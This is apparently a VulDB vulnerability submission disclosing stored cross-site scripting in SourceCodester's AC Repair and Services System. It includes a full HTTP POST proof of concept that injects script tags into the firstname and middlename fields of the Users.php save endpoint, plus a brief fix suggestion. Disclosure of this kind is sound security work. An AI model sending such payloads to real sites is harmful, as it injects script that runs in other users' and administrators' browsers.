| Title | SourceCodester AC Repair and Services System Users.php cross site scripting |
|---|
| Description | I discovered an xss vulnerability in Sourcecodester Ac Repair And Services System(https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html).It is in url/classes/Users.php?f=save.
POST /php-acrss/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------248310740335140400871461243690
Content-Length: 1077
Origin: http://localhost
Connection: close
Referer: http://localhost/php-acrss/admin/?page=user/manage_user
Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="id"
1
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="firstname"
<ScRipt>alert(1)</ScRipt>
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="middlename"
<ScRipt>alert(1)</ScRipt>
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="lastname"
123
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="username"
123
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="password"
123
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="type"
2
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
-----------------------------248310740335140400871461243690--
This is a storage based xss vulnerability where anyone who wants to access url/php-acrss/admin/?page=user/list will receive pop-up windows because the xss code is directly concatenated into the source code. The repair method is to filter parameters such as username once, such as <,>, etc |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html |
|---|
| User | fushuling (UID 45488) |
|---|
| Submission | 07/11/2023 18:14 (3 years ago) |
|---|
| Moderation | 07/13/2023 11:49 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 234013 [SourceCodester AC Repair and Services System 1.0 manage_user firstname/middlename cross site scripting] |
|---|
| Points | 20 |
|---|